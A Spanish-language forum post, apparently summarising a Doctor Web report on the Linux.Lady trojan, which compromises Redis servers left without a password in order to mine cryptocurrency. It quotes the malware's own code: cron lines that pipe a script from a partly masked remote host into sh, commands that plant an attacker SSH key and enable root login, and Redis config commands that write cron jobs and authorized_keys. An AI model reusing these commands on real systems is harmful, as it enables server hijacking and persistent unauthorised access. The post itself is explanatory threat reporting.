Troyano Linux.Lady: Usa los servidores para minar Bitcoins

[h]Se ha detectado un troyano llamado Linux.Lady dise帽ado contra los servidores que usan por defecto Redis NoSQL[/h]

https://www.wifi-libre.com/img/members/3/Ladylinux_1.jpg

Hay tan pocos troyanos para Linux que es casi todo un evento cuando sale uno. :smiley:
El problema para ellos es que no pasan desaparecidos mucho tiempo: No es f谩cil esconderse en un c贸digo abierto.
Los de** Doctorweb** acaban de publicar un reporte sobre uno de estos bichos raros pillado en acci贸n que responde al nombre de Linux.Lady
[list=*]
]Linux.Lady.1 @ Doctor Web Antivirus/]
[/list]
Es un malware que afecta a las distribuciones Linux para servidores
Explota la 鈥渋gnorancia鈥 (o falta de atenci贸n) de los administradores lo m谩s descuidados (o ignorantes): Compromete los sistemas que emplean Redis NoSQL por defecto y que no tienen una contrase帽a habilitada/configurada para limitar el uso este programa.

A pesar de que 鈥減roteger con contrase帽a鈥 sea la base de este oficio y la piedra angular de la seguridad, se estima que podr铆a haber hasta **30 000 **servidores vulnerables.
Parte de la responsabilidad cae en los hombros de VMware y Pivotal (los que lanzaron Redis) por proponer une configuraci贸n por defecto insegura.
Los datos SQL son un tesoro a proteger.
Redis se promociona como siendo 鈥渓iviano y r谩pido鈥
Es justamente por falta de proceso de identificaci贸n que logra estos aparentes buenos resultados鈥 :stuck_out_tongue:
Sacrificar la seguridad para enga帽ar a los m谩s bobos no est谩 bien鈥

Hay que reconocer que nuestra Linux.Lady tiene clase.
No es un virus destructivo a lo tonto sino un par谩sito que sabe encontrar el equilibrio entre chupar los recursos de su hu茅sped y dejarlo vivo.
Con capacidad a propagarse.
Sus principales caracter铆sticas son
[list=1]
]Recoge informaci贸n sobre la maquina infectada y la manda al servidor de control remoto/]
]Descarga y instala en la maquina infectada un programa de criptograf铆a /]
]Ataca los otros ordenadores de la red para auto-replicarse/]
[/list]
En resumen es un malware que crea un parque de zombis dedicados a 鈥渕inar Bit Coins鈥

El troyano crea un ejecutable /usr/sbin/ntp y un fichero de configuraci贸n ** /etc/systemd/system/ntp.service ** que tiene esta pinta:

[Unit] Description=NTP daemon ConditionFileIsExecutable=/usr/sbin/ntp [Service] StartLimitInterval=5 StartLimitBurst=10 ExecStart=/usr/sbin/ntp "-D" Restart=always RestartSec=120 [Install] WantedBy=multi-user.target

Una vez c贸modamente instalada; La Linux.Lady empieza su labor y crea cuatros canales.
Manda al servidor remoto informaci贸n sobre la maquina infectada:
[list=*]
]Versi贸n de Lady.Linux/]
]Cuantas CPU tiene la maquina infectada/]
]nombre del hu茅sped/]
]Cuantos procesos est谩n corriendo/]
]nombre del Sistema Operativo/]
]A que 鈥渇amilia鈥 pertenece el sistema operativo/]
]Tiempo de actividad el hu茅sped/]
[/list]

A cambio de esto recibe un fichero de configuraci贸n a medida para entrar en acci贸n: Descargar, instalar y ejecutar un programa de criptograf铆a (escrito en lenguaje go) para minar BitCoins.
Determina una IP externa para establecer una conexi贸n directa hac铆a el servidor del atacante usando el puerto 6379 sin autenticarse (es el puerto que usa Redis)
Si consigue contactar con el servidor descarga desde la url del fichero de configuraci贸n un script (** Linux.DownLoader.196,**) que instala en el cron scheduler (planificaci贸n de procesos/rutinas programadas)
Esto es lo que hace nuestra 鈥淟ady鈥

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh rm -f ~/.ssh/authorized_keys* echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config /etc/init.d/sshd restart fi if ! -f "/etc/init.d/ntp" ]; then if ! -f "/etc/systemd/system/ntp.service" ]; then mkdir -p /opt curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install fi fi /etc/init.d/ntp start ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

Una vez la conexi贸n establecida el troyano ejecuta estas ordenes

config set stop-writes-on-bgsave-error no config set rdbcompression no config set dir /var/spool/cron config set dbfilename root set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl 懈蟹 泻芯薪褎懈谐邪) save config set dir /root/.ssh config set dbfilename authorized_keys set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ== save del 1 set dir /tmp set dbfilename dump.rdb config set rdbcompression yes

Incluyendo as铆 una llave SSH valida para conectarse mediante este protocolo desde el sistema hu茅sped hacia el servidor remoto.
La maquina infectada ejecutar谩 por SSH y con esta llave

(curl -fsSL %s?ssh | sh) % (ShellUrl)

Para instalar el programa para minar Bit Coins
Se trata de un conjunto de librer铆as 鈥淕o鈥 alojadas en GitHub
Pod茅is ver aqu铆 su arborescencia (No se ve muy bien, lo siento, as铆 es la captura que pusieron)
https://www.wifi-libre.com/img/members/3/Ladylinux_2.jpg

M谩s lectura
[list=*]
]Linux.Lady trojan turns Linux servers into bitcoin miners de Graeme BURTON @ The Enquirer/]
[/list]